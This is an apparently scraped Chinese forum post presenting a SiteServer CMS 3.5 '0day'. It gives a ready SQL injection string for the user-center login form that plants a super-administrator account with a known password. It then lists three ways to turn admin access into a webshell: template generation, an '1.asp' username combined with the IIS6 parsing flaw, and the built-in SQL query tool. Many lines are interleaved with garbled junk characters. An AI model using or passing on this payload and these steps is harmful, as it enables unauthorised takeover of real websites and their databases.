SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
, r3 f! e) D/ b) Q, N0 d
stieserver官网:www.siteserver.cn
1 V8 X- W, q/ V# j& Y7 q5 s

5 `9 T+ a) T6 r, f$ u# ?3 i
' C1 H% R  b  d* O/ O; XEXP:
" ]: \$ O8 m- n0 ~; Z
+ n4 X9 }; M- B. l- o% }% p  w( y直接访问UserCenter/login.aspx
4 z5 a" y5 Z0 F# r3 L/ x


用户名处输入：
7 k5 K/ f" v/ l% U& m; p
( ^8 b# H& k- Q7 p7 w" W123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
) r% I+ ?9 V" q2 H


2 `5 J9 e8 Y% i; Z密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

$ e6 z3 g! z: z- H6 O) `; {

之后再访问后台SiteServer/login.aspx用插入的用户登陆



* c( @8 v* ]; c5 a7 M# G后台拿webshell的三种方法：
( l8 p0 D4 a" T4 E: x
一、
0 C& p1 E9 Z3 ?( m9 S/ L
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" \- H) A1 x3 b
二、

成员权限-》添加用户-》用户名为：1.asp
/ G5 W( t2 x0 A! J
http://127.0.0.1/usercenter/
% Q( E8 q1 H' Q0 g! ?5 J
" _- g2 l/ n) I' O用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

2 P4 v, J6 D4 u& [7 L（ps：后台添加用户时不会验证是否含有非法字符）

三、
' T$ U  a7 Z6 A7 m, k
系统工具-》实用工具-》机器参数查看
4 }. G% T/ Y% b/ \可以看到数据库类型、名称，WEB路径
: u% b$ e, z' h' r& M' r8 C  v* p
系统工具-》数据库工具-》SQL语句查询
- i' F  T  {: R+ {这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# \- ~2 p8 u8 Y1 L/ d& N% |
5 n8 Q/ a$ p/ A# T; B